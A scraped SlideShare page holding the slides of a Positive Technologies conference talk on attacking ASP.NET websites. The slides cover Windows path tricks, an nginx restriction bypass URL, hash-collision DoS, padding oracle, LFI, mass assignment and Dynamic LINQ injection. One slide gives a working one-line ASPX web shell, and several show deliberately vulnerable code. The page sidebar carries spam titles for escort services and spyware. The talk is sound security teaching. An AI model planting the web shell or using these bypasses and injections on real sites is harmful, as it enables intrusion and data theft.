От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
Positive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Positive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
Positive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
Positive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
Positive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
Positive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
Positive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
Positive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Kunal Gupta
 
Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024
aakash malhotra
 
Figma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdfFigma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdf
Management Institute of Skills Development
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
SynapseIndia
 
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
digitalxplive
 
The importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT StandardizationThe importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT Standardization
Axel Rennoch
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
Priyanka Aash
 
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
Torry Harris
 
CiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.pptCiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.ppt
moinahousna
 
How Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdfHow Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdf
HackersList
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
bhumivarma35300
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
huseindihon
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
HackersList
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
Kief Morris
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
SAI KAILASH R
 

Recently uploaded (20)

Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
 
Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024
 
Figma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdfFigma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdf
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
 
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
 
The importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT StandardizationThe importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT Standardization
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
 
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
 
CiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.pptCiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.ppt
 
How Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdfHow Social Media Hackers Help You to See Your Wife's Message.pdf
How Social Media Hackers Help You to See Your Wife's Message.pdf
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
 

Hack ASP.NET website

  • 1. TO HACK AN ASP .NET WEBSITE? HARD, BUT POSSIBLE! Vladimir Kochetkov Positive Technologies
  • 2. A Blast From The Past: File System DOS devices and reserved names: NUL:, CON:, AUX:, PRN:, COM[1-9]:, LPT[1-9]: - the colon is optional, names can be used as part of the path Reserved characters: < > : " / | ? * Case insensitivity of names: Filename == FileName == filename == FILENAME Support for short names 8.3: LongFileName.Extension ~= LONGFI~1.EXT ~= LO0135~1.EXT Ending characters: Filename == Filename... == Filename
  • 3. A Blast From The Past: File System Named pipe and mailslots (CreateFile): Hostpipe<name> , Hostmailslot<name> Alternative syntax of relative paths: C:Windowsnotepad.exe == C:notepad.exe , if Windows is a current catalog of C: Substitutions (FindFirstFile): < == * , > == ? , " == . UNC and Unicode paths: C:WindowsSystem32 HostC$WindowsSystem32 .C:WindowsSystem32 ?C:WindowsSystem32 ?UNCHostC$WindowsSystem32
  • 4. A Blast From The Past: File System Meta attributes and NTFS alternative data streams: Directory:<Name>:<Type>File:<Name>:<Type> Files Meta Attributes Indices Meta Attributes $STANDARD_INFORMATION $INDEX_ROOT $FILE_NAME $INDEX_ALLOCATION $DATA $BITMAP $ATTRIBUTE_LIST $OBJECT_ID $REPARSE_POINT C:Windowshh.exe == C:Windows:$I30:$INDEX_ALLOCATIONhh.exe C:Windowsnotepad.exe == C:Windowsnotepad.exe::$DATA FileName.aspx == FileName.aspx:.jpg
  • 5. [PT-2012-06] Nginx Restrictions Bypass Severity level: Medium (5.0) (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vulnerable versions: Nginx for Windows <= v1.3 Vector: Remote The flaw enables an intruder to forward HTTP requests to certain URL addresses, bypassing the rules set in the Location directives of the web server configuration. By exploiting the vulnerability, a potential hacker could gain access to the application source code and closed parts of the website, detect new vulnerabilities, steal passwords to the database or other services, etc. :$I30:$INDEX_ALLOCATION were processed as a part of the catalog name.
  • 6. [PT-2012-06] Nginx Restrictions Bypass http://hostname/.svn/entries HTTP/1.1 403 Forbidden Server: nginx/1.2.0 … location ~/.svn/ { deny all; } … HTTP/1.1 200 OK Server: nginx/1.2.0 http://hostname/.svn::$INDEX_ALLOCATION/entries * A stable version of nginx-1.2.0 for Windows, released 2012-04-23
  • 8. Memory Corruption Interaction with native libraries, use of mix assemblies MS12-025, April 2012: - arbitrary code execution is triggered by exploitation of an integer overflow vulnerability in gdiplus.dll which causes heap corruption when calling the constructor of the System.Drawing.Imaging.EncoderParameter class. Insecure managed code unsafe void bufferOverflow(string s) { char* ptr = stackalloc char[10]; foreach (var c in s) { *ptr++ = c } }
  • 9. Turkish I And Other Peculiarities If two strings are compared with no regard to the current regional settings, the result might be quite unexpected: The English language: I&i The Turkish language: I&ı+İ&i <%@ Page Language="C#" Culture="Auto" %> <%@ Import Namespace="System.Globalization" %> <! DOCTYPE html> … <script runat="server"> … if (Session["mode"].ToLower() != "admin") … if (String.Compare(Request["path"]), 0, "FILE:", 0, 5, true) …
  • 10. Collision of Object Hashes System.Object.GetHashCode() returns a 32 bit hash code of an object (takes on values within the range from -2147483648 to 2147483647). (http://blogs.msdn.com/b/ericlippert/archive/2010/03/22/socks-birthdays-and-hash-collisions.aspx)
  • 11. Collision in ASP .NET (MS11-100) Standard situation: Unusual situation: 3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686YJQJ8K=&9XUUCJEENJ=&F X4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=& DO9WX2R9H=&RYLZSIQT8V=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=& LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138LL=&XXST36DRX=&JR YRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=& MOCGW14ZU7=&I0JKKKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E= =&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MPJBASYMRM=&25EWGNN5NE … over 4Mb form data … (https://github.com/HybrisDisaster/aspHashDoS)
  • 12. A Tricky Plan (Post-Mortem MS11-100) 1. Create 1000 collision strings for each combination ‘.NET version’/’hardware platform’ 2. Send each combination as POST request parameters 3. Measure the response time for each request 4. ??? 5. ;)
  • 15. ASP.NET Peculiarities Special catalogs and files: - App_Browser –browsers definition (*.browsers) - App_Code – a source code of helper classes and logics - App_Data – data stores - App_GlobalResources, App_LocalResources – application resources (*.resx, *.resources) - App_Themes – topics (*.skin, *.css, images, etc); - App_WebReferences – links to web services (*.wsdl, *.xsd, *.disco, *.discomap) - Bin – compiled builds used by the application - web.config, web.*.config – configuration files that determine settings of the web server and application
  • 16. ASP .NET Peculiarities Standard HTTP handlers: - WebResource.axd – access to the static resources embedded in the application assemblies. - ScriptResource.axd – access to JavaScripts embedded in the assemblies or stored on the disk. Usage: http://hostname/*Resource.axd?d=<resourceId>&t=<timestamp> Example: http://hostname/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP 8mXnNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3- kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1 where ‘d’ is an encrypted parameters: Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c3 8a3a9b
  • 17. Padding Oracle (MS10-070) Consequences: – getting encryption/decryption keys:  authentication cookies  ViewState and Event Validation  Arguments for WebRecource.axd and ScriptResource.axd => Reading arbitrary files inside the application catalog Corrections:  Padding error returns a generic error message  A random number is used as IV  The format of encrypted strings is changed for their validation  ScriptResource.axd can handle only *.js files
  • 18. ASP .NET Features Standard HTTP handlers: - Trace.axd request tracing (available only in the debugging mode)
  • 19. Features of LFI exploitation Response.WriteFile(<vfilename>) - Allows including any file, except *.config, inside the application catalog - The file is included statically without code execution - Accepts virtual file name as an argument Server.Execute(<vfilename>) - Allows including any file, except for *.config, into the application catalog - Calls a handler for the sent file, includes the result into the response - Accepts virtual file name as an argument File.ReadAllText(<filename>) - Allows including any file if obtains enough privileges - The file is included statically without code execution - Accepts file name as an argument
  • 20. Minimum C# Shell <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <%= Process.Start( new ProcessStartInfo( "cmd","/c " + Request["c"] ) { UseShellExecute = false, RedirectStandardOutput = true } ).StandardOutput.ReadToEnd() %>
  • 21. ViewState Meant to transfer data on view element to the server. - Is transferred in the __VIEWSTATE parameter - Encryption and integrity are not ensured in many cases - Is used by developers for session data storage on the client, though is not meant for this - Violation of its integrity can trigger exploitation of various threats from XXS to violation of application’s functionality.
  • 22. Request and Event Validations Request Validation is an embedded simple WAF aimed at preventing XSS. Blocks all requests that contain: &# < followed by a letter, !, / and ? Besides, it skips extraneous parameters started with с __ Event Validation is an embedded mechanism of event data validation. It is a __EVENTVALIDATION parameter that stores hashes of acceptable elements of of forms, events, ViewState, etc. Contrary to the common belief, it is insufficient against CSRF attacks as a standard implementation instance.
  • 23. Mass Assignment Model: Controller: public class User public class UserController : Controller { { public int Id IUserRepository _userRepository; { get; set; } public UserController(IUserRepository userRepository) { public string UserName _userRepository = userRepository; { get; set; } } public string Password { get; set; } public ActionResult Edit(int id) { public bool IsAdmin var user = _userRepository.GetUserById(id); { get; set; } return View(user); } } [HttpPost] public ActionResult Edit(int id, FormCollection collection) { try { var user = _userRepository.GetUserById(id); UpdateModel(user); _userRepository.SaveUser(user); return RedirectToAction("Index"); } catch { return View(); } } }
  • 24. Mass Assignment (http://digitalbush.com/2012/03/05/mass-assignment-aspnet-mvc/)
  • 25. LINQ Injection LINQ is a query language embedded into the syntax of the .NET languages. var result = from item in itemsList where item.field1 % 2 == 0 orderby item.field2 descending select new { item.field2, item.field3 }; Expression.Lambda<Predicate<int>>( Expression.Equal( Expression.Modulo( parameterN, Expression.Constant(2) ), Expression.Constant(0) ), parameterN); var result = itemsList .Where(x => x.field1 % 2 == 0) .Select(x => new { x.field2, x.field3 }) .OrderByDescending(x => x.field2);
  • 26. LINQ Injection Dynamic LINQ is one of a few libraries used to create dynamic run- time LINQ requests. Features: - Definition of expressions by strings; var modifier = "0"; - Basic simple operations var result = itemsList - Access to members of static and .Where("field1 % 2 == " + modifier) .Select(x => new { x.field2, x.field3 }) instant data types .OrderByDescending(x => x.field2); - Type instantiation and anonymous types construction What if "modifier" is formed out of input data and contains 0 OR 1 == 1 ?
  • 27. LINQ Injection Injection’s limitations in Dynamic LINQ: - Access to fields, properties and methods is available only for a collection type or for accessible types specified in the ‘white list’ - All expression parts must be executed without errors; error messages do not contain useful output - Injection is performable only for isolated parts of requests Injection’s possibilities in Dynamic LINQ: - Authentication / authorization bypass - Unauthorized access to the collection data - Abuse of functionality (provided that the collection objects have the statefull fields) - Conduction of DoS attacks (DoS). Remote Code Execution is actual in other solutions
  • 28. NorthWind DEMO public AjaxStoreResult GetCustomers(int limit, int start, string dir, string sort) { var query = (from c in this.DBContext.Customers select new { c.CustomerID, c.CompanyName, c.ContactName, c.Phone, c.Fax, c.Region }).OrderBy(string.Concat(sort, " ", dir)); int total = query.ToList().Count; query = query.Skip(start).Take(limit); return new AjaxStoreResult(query, total); }
  • 30. Thank You for Your Attention! Questions? vkohetkov@ptsecurity.ru twitter: @kochetkov_v